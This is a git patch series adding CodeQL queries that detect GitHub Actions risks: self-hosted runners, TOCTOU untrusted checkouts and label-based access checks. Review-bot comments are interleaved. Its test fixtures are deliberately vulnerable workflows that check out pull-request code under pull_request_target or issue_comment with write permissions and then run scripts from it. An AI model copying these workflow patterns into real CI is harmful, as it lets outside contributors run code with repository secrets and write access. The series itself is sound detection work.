@@ -11,36 +11,7 @@ * external/cwe/cwe-284 */ -import actions -import codeql.actions.dataflow.ExternalFlow - -/** - * This predicate uses data available in the workflow file to identify self-hosted runners. - * It does not know if the repository is public or private. - * It is a best-effort approach to identify self-hosted runners. - */ -predicate staticallyIdentifiedSelfHostedRunner(Job job) { - exists(string label | - job.getEnclosingWorkflow().getATriggerEvent().getName() = - ["pull_request", "pull_request_review", "pull_request_review_comment", "pull_request_target"] and - label = job.getARunsOnLabel() and - // source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/poutine/utils.rego#L49C3-L49C136 - not label - .regexpMatch("(?i)^((ubuntu-(([0-9]{2})\\.04|latest)|macos-([0-9]{2}|latest)(-x?large)?|windows-(20[0-9]{2}|latest)|(buildjet|warp)-[a-z0-9-]+))$") - ) -} - -/** - * This predicate uses data available in the job log files to identify self-hosted runners. - * It is a best-effort approach to identify self-hosted runners. - */ -predicate dynamicallyIdentifiedSelfHostedRunner(Job job) { - exists(string runner_info | - workflowDataModel(job.getEnclosingWorkflow().getLocation().getFile().getRelativePath(), - "public", job.getId(), _, _, runner_info) and - runner_info.matches("self-hosted:true") - ) -} +import codeql.actions.security.SelfHostedQuery from Job job where staticallyIdentifiedSelfHostedRunner(job) or dynamicallyIdentifiedSelfHostedRunner(job) diff --git a/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml index 81d614e5122..37eb2bddb58 100644 --- a/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml +++ b/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml 
@@ -26,3 +26,69 @@ jobs: runs-on: self-hosted-azure steps: - run: cmd + test5: + strategy: + fail-fast: false + matrix: + platform: + - name: Linux + os: ubuntu-latest + shell: bash + - name: macOS + os: macos-latest + shell: bash + - name: Windows + os: windows-latest + shell: cmd + node-version: + - 16.14.0 + - 16.x + - 18.0.0 + - 18.x + - 20.x + runs-on: ${{ matrix.platform.os }} + steps: + - run: cmd + test6: + strategy: + matrix: + os: [ubuntu-latest, macos-latest] + runs-on: ${{ matrix.os }} + steps: + - run: cmd + test7: + strategy: + matrix: + os: [self-hosted, ubuntu-latest] + runs-on: ${{ matrix.os }} + steps: + - run: cmd + test8: + strategy: + matrix: + settings: + - host: + - 'self-hosted' + - 'macos' + - 'arm64' + target: 'x86_64-apple-darwin' + runs-on: ${{ matrix.settings.host }} + steps: + - run: cmd + test9: + strategy: + matrix: + os: ${{ github.repository }} + runs-on: ${{ matrix.os }} + steps: + - run: cmd + test10: + strategy: + matrix: + os: ${{ github.repository }} + foo: + - bar: ${{ github.repository }} + baz: "asdf" + runs-on: ${{ matrix.foo.bar }} + steps: + - run: cmd diff --git a/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected b/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected index 920a818ab35..306bed9baec 100644 --- a/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected +++ b/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected 
@@ -1,4 +1,8 @@ | .github/workflows/test1.yml:8:5:11:2 | Job: test1 | Job runs on self-hosted runner | | .github/workflows/test1.yml:12:5:17:2 | Job: test2 | Job runs on self-hosted runner | | .github/workflows/test1.yml:18:5:25:2 | Job: test3 | Job runs on self-hosted runner | -| .github/workflows/test1.yml:26:5:28:15 | Job: test4 | Job runs on self-hosted runner | +| .github/workflows/test1.yml:26:5:29:2 | Job: test4 | Job runs on self-hosted runner | +| .github/workflows/test1.yml:60:5:66:2 | Job: test7 | Job runs on self-hosted runner | +| .github/workflows/test1.yml:67:5:78:2 | Job: test8 | Job runs on self-hosted runner | +| .github/workflows/test1.yml:79:5:85:2 | Job: test9 | Job runs on self-hosted runner | +| .github/workflows/test1.yml:86:5:94:15 | Job: test10 | Job runs on self-hosted runner | From 9ee9314cb962c8052c41dfded556fe18cf793ee1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 13 May 2024 10:37:42 +0200 Subject: [PATCH 0265/1267] Resolve conflicts after rebasing --- ql/lib/codeql/actions/security/SelfHostedQuery.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/security/SelfHostedQuery.qll b/ql/lib/codeql/actions/security/SelfHostedQuery.qll index 94c6c49a34b..898af1a699a 100644 --- a/ql/lib/codeql/actions/security/SelfHostedQuery.qll +++ b/ql/lib/codeql/actions/security/SelfHostedQuery.qll @@ -14,7 +14,7 @@ string selfHostedRunnerRegexp() { */ predicate staticallyIdentifiedSelfHostedRunner(Job job) { exists(string label | - job.getATriggerEvent() = + job.getATriggerEvent().getName() = ["pull_request", "pull_request_review", "pull_request_review_comment", "pull_request_target"] and label = job.getARunsOnLabel() and not label.regexpMatch(selfHostedRunnerRegexp()) From a1efc78ac7d887e5b18ca8ef3bf40409cbf989ae Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 13 May 2024 13:47:01 +0200 Subject: [PATCH 0266/1267] Refactor regexps --- .../actions/security/SelfHostedQuery.qll | 23 ++++++++++++++----- 1 file changed, 17 insertions(+), 6 deletions(-) diff --git a/ql/lib/codeql/actions/security/SelfHostedQuery.qll b/ql/lib/codeql/actions/security/SelfHostedQuery.qll index 898af1a699a..e1279189c27 100644 --- a/ql/lib/codeql/actions/security/SelfHostedQuery.qll +++ b/ql/lib/codeql/actions/security/SelfHostedQuery.qll @@ -1,10 +1,17 @@ import actions import codeql.actions.dataflow.ExternalFlow -string selfHostedRunnerRegexp() { - // source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/poutine/utils.rego#L49C3-L49C136 - result = - "(?i)^((ubuntu-(([0-9]{2})\\.04|latest)|macos-([0-9]{2}|latest)(-x?large)?|windows-(20[0-9]{2}|latest)|(buildjet|warp)-[a-z0-9-]+))$" +bindingset[runner] +predicate isGithubHostedRunner(string runner) { + // list of github hosted repos: https://github.com/actions/runner-images/blob/main/README.md#available-images + runner + .toLowerCase() + .regexpMatch("^(ubuntu-([0-9.]+|latest)|macos-([0-9]+|latest)(-x?large)?|windows-([0-9.]+|latest)|(buildjet|warp)-[a-z0-9-]+)$") +} + +bindingset[runner] +predicate is3rdPartyHostedRunner(string runner) { + runner.toLowerCase().regexpMatch("^(buildjet|warp)-[a-z0-9-]+$") } /** @@ -15,9 +22,13 @@ string selfHostedRunnerRegexp() { predicate staticallyIdentifiedSelfHostedRunner(Job job) { exists(string label | job.getATriggerEvent().getName() = - ["pull_request", "pull_request_review", "pull_request_review_comment", "pull_request_target"] and + [ + "issue_comment", "pull_request", "pull_request_review", "pull_request_review_comment", + "pull_request_target", "workflow_run" + ] and label = job.getARunsOnLabel() and - not label.regexpMatch(selfHostedRunnerRegexp()) + not isGithubHostedRunner(label) and + not is3rdPartyHostedRunner(label) ) } 
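Review bot: `is3rdPartyHostedRunner` accepts any label that begins with `buildjet-` or `warp-`, and `staticallyIdentifiedSelfHostedRunner` then excludes the job, so a self-hosted runner registered under a custom label with one of those prefixes (for example a constructed `warp-build`) would not be reported. Runner labels are free-form, so a name-only allowlist trades false positives for false negatives, and that trade-off should be stated in QLDoc on the predicate: it recognises third-party hosted runners by label prefix only and cannot tell them apart from a self-hosted runner that reuses the prefix. Both new predicates are currently undocumented, unlike the two predicates below them. The inline comment in `isGithubHostedRunner` should read `// list of GitHub-hosted runner images: ...` instead of "github hosted repos".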
From cee0389d6eca33f41b51368601c4d06c0d99fd96 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 13 May 2024 15:33:28 +0200 Subject: [PATCH 0267/1267] Update SelfHostedQuery.qll MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Jaroslav LobaÄevski --- ql/lib/codeql/actions/security/SelfHostedQuery.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/security/SelfHostedQuery.qll b/ql/lib/codeql/actions/security/SelfHostedQuery.qll index e1279189c27..3047ba35b06 100644 --- a/ql/lib/codeql/actions/security/SelfHostedQuery.qll +++ b/ql/lib/codeql/actions/security/SelfHostedQuery.qll @@ -6,7 +6,7 @@ predicate isGithubHostedRunner(string runner) { // list of github hosted repos: https://github.com/actions/runner-images/blob/main/README.md#available-images runner .toLowerCase() - .regexpMatch("^(ubuntu-([0-9.]+|latest)|macos-([0-9]+|latest)(-x?large)?|windows-([0-9.]+|latest)|(buildjet|warp)-[a-z0-9-]+)$") + .regexpMatch("^(ubuntu-([0-9.]+|latest)|macos-([0-9]+|latest)(-x?large)?|windows-([0-9.]+|latest))$") } bindingset[runner] From 60769f1671c3b65548eef36f684bf3dc67f3c540 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 13 May 2024 16:26:53 +0200 Subject: [PATCH 0268/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index e68a4c67cc4..acfc1c7e210 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.22 +version: 0.0.23 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 465be503e7c..efafbbb55ba 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml 
@@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.22 +version: 0.0.23 groups: - actions - queries From b4096e0201307a16775226f8d37f2aa0d79f9907 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 14 May 2024 09:56:23 +0200 Subject: [PATCH 0269/1267] Refactor control checks --- .../security/UntrustedCheckoutQuery.qll | 45 +++++++++++++++---- 1 file changed, 37 insertions(+), 8 deletions(-) diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 10a45830324..bf60c4a2f7f 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll 
@@ -221,17 +221,46 @@ class GhSHACheckout extends SHACheckoutStep instanceof Run { } /** An If node that contains an actor, user or label check */ -class ControlCheck extends If { - ControlCheck() { +abstract class ControlCheck extends If { } + +class LabelControlCheck extends ControlCheck { + LabelControlCheck() { + // eg: contains(github.event.pull_request.labels.*.name, 'safe to test') + // eg: github.event.label.name == 'safe to test' exists( Utils::normalizeExpr(this.getCondition()) .regexpFind([ - "\\bgithub\\.actor\\b", // actor - "\\bgithub\\.triggering_actor\\b", // actor - "\\bgithub\\.event\\.comment\\.user\\.login\\b", //user - "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", //user - "\\bgithub\\.event\\.pull_request\\.labels\\b", // label - "\\bgithub\\.event\\.label\\.name\\b" // label + "\\bgithub\\.event\\.pull_request\\.labels\\b", "\\bgithub\\.event\\.label\\.name\\b" + ], _, _) + ) + } +} + +class ActorControlCheck extends ControlCheck { + ActorControlCheck() { + // eg: contains(github.actor, 'dependabot') + // eg: github.triggering_actor != 'CI Agent' + // eg: github.event.pull_request.user.login == 'mybot' + exists( + Utils::normalizeExpr(this.getCondition()) + .regexpFind([ + "\\bgithub\\.actor\\b", "\\bgithub\\.triggering_actor\\b", + "\\bgithub\\.event\\.comment\\.user\\.login\\b", + "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", + ], _, _) + ) + } +} + +class AssociationControlCheck extends ControlCheck { + AssociationControlCheck() { + // eg: contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) + exists( + Utils::normalizeExpr(this.getCondition()) + .regexpFind([ + "\\bgithub\\.event\\.comment\\.author_association\\b", + "\\bgithub\\.event\\.issue\\.author_association\\b", + "\\bgithub\\.event\\.pull_request\\.author_association\\b", ], _, _) ) } From 7c295e011a31d92dff889e9ffefede2b6a940251 Mon Sep 17 00:00:00 2001 
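Review bot: Each of the three new classes holds as soon as the context name appears anywhere in the `if:` expression, so a condition that only excludes an actor (the hunk's own example `github.triggering_actor != 'CI Agent'`) or one that is OR-ed with an unrelated test still counts as a control check. That is harmless where the `ControlCheck` is the thing being reported, but a query that uses it to suppress a finding would under-report; those callers are not visible from this hunk. Please state this presence-only matching in QLDoc on each subclass. The comment on the abstract class also needs updating: it still says "actor, user or label check" although `AssociationControlCheck` is new and the user-login patterns now live under `ActorControlCheck`.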
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 14 May 2024 10:19:27 +0200 Subject: [PATCH 0270/1267] TOCTOU queries and tests --- .../UntrustedCheckoutTOCTOUCritical.ql | 25 +++++++++++ .../CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 25 +++++++++++ .../CWE-367/.github/workflows/comment.yml | 41 +++++++++++++++++++ .../CWE-367/.github/workflows/deployment.yml | 31 ++++++++++++++ .../CWE-367/.github/workflows/label.yml | 17 ++++++++ .../UntrustedCheckoutTOCTOUCritical.expected | 2 + .../UntrustedCheckoutTOCTOUCritical.qlref | 1 + .../UntrustedCheckoutTOCTOUHigh.expected | 0 .../CWE-367/UntrustedCheckoutTOCTOUHigh.qlref | 1 + 9 files changed, 143 insertions(+) create mode 100644 ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql create mode 100644 ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/deployment.yml create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/label.yml create mode 100644 ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected create mode 100644 ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref create mode 100644 ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected create mode 100644 ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql new file mode 100644 index 00000000000..c5e12c0fccc --- /dev/null +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql 
@@ -0,0 +1,25 @@
+/**
+ * @name Untrusted Checkout TOCTOU
+ * @description Untrusted Checkout is protected by a security check but the checked-out branch can be changed after the check.
+ * @kind problem
+ * @problem.severity error
+ * @precision high
+ * @security-severity 9.3
+ * @id actions/untrusted-checkout-toctou/critical
+ * @tags actions
+ * security
+ * external/cwe/cwe-367
+ */
+
+import actions
+import codeql.actions.security.UntrustedCheckoutQuery
+import codeql.actions.security.PoisonableSteps
+
+from ControlCheck check, MutableRefCheckoutStep checkout
+where
+ // the mutable checkout step is protected by an access check
+ check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and
+ // the checked-out code may lead to arbitrary code execution
+ checkout.getAFollowingStep() instanceof PoisonableStep
+select checkout, "The checked-out code can be changed after the authorization check o step $@.",
+ check, check.toString()
diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql
new file mode 100644
index 00000000000..b74c3389f9d
--- /dev/null
+++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql
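Review bot: The `where` clause puts no constraint on the trigger or on the job's privileges, whereas `ImproperAccessControl.ql`, added later in this series, requires `job.isPrivileged()`. Unless `MutableRefCheckoutStep` already implies a privileged context (its definition is outside this hunk), a guarded checkout in an unprivileged job would be reported at `@security-severity 9.3`. A conjunct mirroring that privilege test would keep the critical rating for jobs that hold secrets or write permissions. The alert text also has a typo, "authorization check o step"; it should read `"The checked-out code can be changed after the authorization check on step $@."`. The same string appears in `UntrustedCheckoutTOCTOUHigh.ql`, in `ImproperAccessControl.ql` and in the `.expected` files.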
@@ -0,0 +1,25 @@
+/**
+ * @name Untrusted Checkout TOCTOU
+ * @description Untrusted Checkout is protected by a security check but the checked-out branch can be changed after the check.
+ * @kind problem
+ * @problem.severity warning
+ * @precision medium
+ * @security-severity 5.3
+ * @id actions/untrusted-checkout-toctou/high
+ * @tags actions
+ * security
+ * external/cwe/cwe-367
+ */
+
+import actions
+import codeql.actions.security.UntrustedCheckoutQuery
+import codeql.actions.security.PoisonableSteps
+
+from ControlCheck check, MutableRefCheckoutStep checkout
+where
+ // the mutable checkout step is protected by an access check
+ check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and
+ // there are no evidences that the checked-out code can lead to arbitrary code execution
+ not checkout.getAFollowingStep() instanceof PoisonableStep
+select checkout, "The checked-out code can be changed after the authorization check o step $@.",
+ check, check.toString()
diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml
new file mode 100644
index 00000000000..498b46090cb
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml
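Review bot: The query metadata is inconsistent: the id ends in `/high`, but `@security-severity 5.3` together with `@problem.severity warning` puts the rule in the medium band. `@name` is also identical to the critical variant, so the two rules cannot be told apart in a results list. Either change the id to `actions/untrusted-checkout-toctou/medium` or raise the score to match, and give each query its own `@name`. Separately, `not checkout.getAFollowingStep() instanceof PoisonableStep` also holds when the checkout has no following step at all, so the comment above it could say `// no following step is known to execute the checked-out code (also holds when there is no following step)`.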
@@ -0,0 +1,41 @@ +# https://github.com/AdnaneKhan/ActionsTOCTOU/blob/main/.github/workflows/comment_victim.yml +name: Comment Triggered Test +on: + issue_comment: + types: [created] +permissions: 'write-all' +jobs: + benchmark: + name: Integration Tests + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + runs-on: [ubuntu-latest] + steps: + + # test1 + - uses: actions/github-script@v6 + name: Get PR branch + id: issue + with: + script: | + const pr = context.payload.issue.number + const data = await github.rest.pulls.get({ + owner: context.repo.owner, + repo: context.repo.repo, + pull_number: pr + }) + return { + ref: data.data.head.ref, + sha: data.data.head.sha, + } + - uses: actions/checkout@v4 + with: + submodules: recursive + ref: ${{ fromJson(steps.issue.outputs.result).sha }} + - run: bash comment_example/tests.sh + + # test2 + - uses: actions/checkout@v4 + with: + submodules: recursive + ref: "refs/pull/${{ github.event.number }}/merge" + - run: bash comment_example/tests.sh diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment.yml new file mode 100644 index 00000000000..f0a3035777c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment.yml 
@@ -0,0 +1,31 @@ +# https://github.com/AdnaneKhan/ActionsTOCTOU/blob/main/.github/workflows/deployment_victim.yml +name: Environment PR Check + +on: + pull_request_target: + branches: + - main + paths: + - 'README.md' + workflow_dispatch: +jobs: + test: + environment: Public CI + runs-on: ubuntu-latest + steps: + - name: Checkout from PR branch + uses: actions/checkout@v4 + with: + repository: ${{ github.event.pull_request.head.repo.full_name }} + ref: ${{ github.event.pull_request.head.ref }} + + - name: Set Node.js 20.x for GitHub Action + uses: actions/setup-node@v4 + with: + node-version: 20.x + + - name: installing node_modules + run: cd deployment_example && npm install + + - name: Build GitHub Action + run: cd deployment_example && npm run build diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/label.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/label.yml new file mode 100644 index 00000000000..1f04440d28b --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/label.yml @@ -0,0 +1,17 @@ +# https://github.com/AdnaneKhan/ActionsTOCTOU/blob/main/.github/workflows/label_victim.yml +name: Label Trigger Test +on: + pull_request_target: + types: [labeled] + branches: [main] + +jobs: + integration-tests: + runs-on: ubuntu-latest + if: contains(github.event.pull_request.labels.*.name, 'safe-to-test') + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - run: bash label_example/tests.sh diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected new file mode 100644 index 00000000000..e3a42b3265d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected 
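Review bot: `deployment.yml` has no row in either `.expected` file added by this commit (the critical one lists only `comment.yml` and `label.yml`, the high one is empty), so as committed the fixture asserts that the environment-approval case goes undetected. That follows from `ControlCheck` extending `If`: this job is gated by `environment: Public CI`, not by an `if:` condition. If this is a known gap, mark it at the top of the file with `# not detected yet: environment approval is not modelled as a control check`. Without that, the empty expectation reads as a verdict that the workflow is safe.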
@@ -0,0 +1,2 @@ +| .github/workflows/comment.yml:37:9:41:6 | Uses Step | The checked-out code can be changed after the authorization check o step $@. | .github/workflows/comment.yml:10:9:10:188 | ${{ git ... s ') }} | ${{ git ... s ') }} | +| .github/workflows/label.yml:13:9:17:6 | Uses Step | The checked-out code can be changed after the authorization check o step $@. | .github/workflows/label.yml:11:9:11:73 | contain ... -test') | contain ... -test') | diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref new file mode 100644 index 00000000000..f924f8fe750 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref @@ -0,0 +1 @@ +Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected new file mode 100644 index 00000000000..e69de29bb2d diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref new file mode 100644 index 00000000000..6284c786b3a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref @@ -0,0 +1 @@ +Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql From 73fbd2311bc0eaded3f7855037c9249d252f6cf5 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 14 May 2024 10:20:04 +0200 Subject: [PATCH 0271/1267] Improper access check queries and tests --- .../Security/CWE-285/ImproperAccessControl.ql | 30 +++++++++++++++++++ .../CWE-285/.github/workflows/test1.yml | 20 +++++++++++++ .../CWE-285/.github/workflows/test2.yml | 20 +++++++++++++ .../CWE-285/ImproperAccessControl.expected | 1 + .../CWE-285/ImproperAccessControl.qlref | 2 ++ 5 files changed, 73 insertions(+) create mode 100644 ql/src/Security/CWE-285/ImproperAccessControl.ql create mode 100644 ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml create mode 100644 ql/test/query-tests/Security/CWE-285/.github/workflows/test2.yml create mode 100644 ql/test/query-tests/Security/CWE-285/ImproperAccessControl.expected create mode 100644 ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref diff --git a/ql/src/Security/CWE-285/ImproperAccessControl.ql b/ql/src/Security/CWE-285/ImproperAccessControl.ql new file mode 100644 index 00000000000..88ac3cee04d --- /dev/null +++ b/ql/src/Security/CWE-285/ImproperAccessControl.ql 
@@ -0,0 +1,30 @@
+/**
+ * @name Improper Access Control
+ * @description The access control mechanism is not properly implemented, allowing untrusted code to be executed in a privileged context.
+ * @kind problem
+ * @problem.severity error
+ * @precision high
+ * @security-severity 9.3
+ * @id actions/improper-access-control
+ * @tags actions
+ * security
+ * external/cwe/cwe-285
+ */
+
+import codeql.actions.security.UntrustedCheckoutQuery
+
+from LocalJob job, LabelControlCheck check, MutableRefCheckoutStep checkout, Event event
+where
+ job = checkout.getEnclosingJob() and
+ job.isPrivileged() and
+ job.getATriggerEvent() = event and
+ event.getName() = "pull_request_target" and
+ event.getAnActivityType() = "synchronize" and
+ job.getAStep() = checkout and
+ (
+ checkout.getIf() = check
+ or
+ checkout.getEnclosingJob().getIf() = check
+ )
+select checkout, "The checked-out code can be changed after the authorization check o step $@.",
+ check, check.toString()
diff --git a/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml
new file mode 100644
index 00000000000..48833460b44
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml
@@ -0,0 +1,20 @@
+name: Pull request feedback
+
+on:
+ pull_request_target:
+ types: [ opened, synchronize ]
+
+permissions: {}
+jobs:
+ test:
+ permissions:
+ contents: write
+ pull-requests: write
+ runs-on: ubuntu-latest
+ steps:
+ - name: Checkout repo for OWNER TEST
+ uses: actions/checkout@v3
+ if: contains(github.event.pull_request.labels.*.name, 'safe to test')
+ with:
+ ref: ${{ github.event.pull_request.head.ref }}
+ - run: ./cmd
diff --git a/ql/test/query-tests/Security/CWE-285/.github/workflows/test2.yml b/ql/test/query-tests/Security/CWE-285/.github/workflows/test2.yml
new file mode 100644
index 00000000000..be6a6cf3939
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-285/.github/workflows/test2.yml
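Review bot: The `select` message in `ImproperAccessControl.ql` is copied from the TOCTOU queries, typo included, but what this query establishes is different: a label check on a privileged `pull_request_target` job that also runs on `synchronize`, so commits pushed after labelling run without a fresh approval. The message should say that, for example `"The label check $@ does not cover commits pushed after labelling, because the workflow also runs on 'synchronize'."`. The conjunct `job.getAStep() = checkout` repeats `job = checkout.getEnclosingJob()` and can be dropped. It is also worth confirming what `event.getAnActivityType()` returns when `types:` is omitted, since the default activity types for `pull_request_target` include `synchronize`; both fixtures set `types:` explicitly, so that case is untested.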
@@ -0,0 +1,20 @@ +name: Pull request feedback + +on: + pull_request_target: + types: [ labeled ] + +permissions: {} +jobs: + test: + permissions: + contents: write + pull-requests: write + runs-on: ubuntu-latest + steps: + - name: Checkout repo for OWNER TEST + uses: actions/checkout@v3 + if: contains(github.event.pull_request.labels.*.name, 'safe to test') + with: + ref: ${{ github.event.pull_request.head.ref }} + - run: ./cmd diff --git a/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.expected b/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.expected new file mode 100644 index 00000000000..53dd12b9fb6 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.expected @@ -0,0 +1 @@ +| .github/workflows/test1.yml:15:7:20:4 | Uses Step | The checked-out code can be changed after the authorization check o step $@. | .github/workflows/test1.yml:17:11:17:75 | contain ... test') | contain ... test') | diff --git a/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref b/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref new file mode 100644 index 00000000000..09a19f21e3c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref @@ -0,0 +1,2 @@ +Security/CWE-285/ImproperAccessControl.ql + From 00f77ca9ecda1661a11a6fb3b3ed005549809445 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 14 May 2024 11:36:43 +0200 Subject: [PATCH 0272/1267] Add missing source for peter-murray/issue-body-parser-action --- ...-murray_issue-body-parser-action.model.yml | 6 ++ .../CWE-094/.github/workflows/test3.yml | 61 +++++++++++++++++++ 2 files changed, 67 insertions(+) create mode 100644 ql/lib/ext/peter-murray_issue-body-parser-action.model.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test3.yml 
diff --git a/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml b/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml new file mode 100644 index 00000000000..d156d7da658 --- /dev/null +++ b/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + - ["peter-murray/issue-body-parser-action", "*", "output.*", "text", "manual"] diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test3.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test3.yml new file mode 100644 index 00000000000..40fe86529b0 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test3.yml 
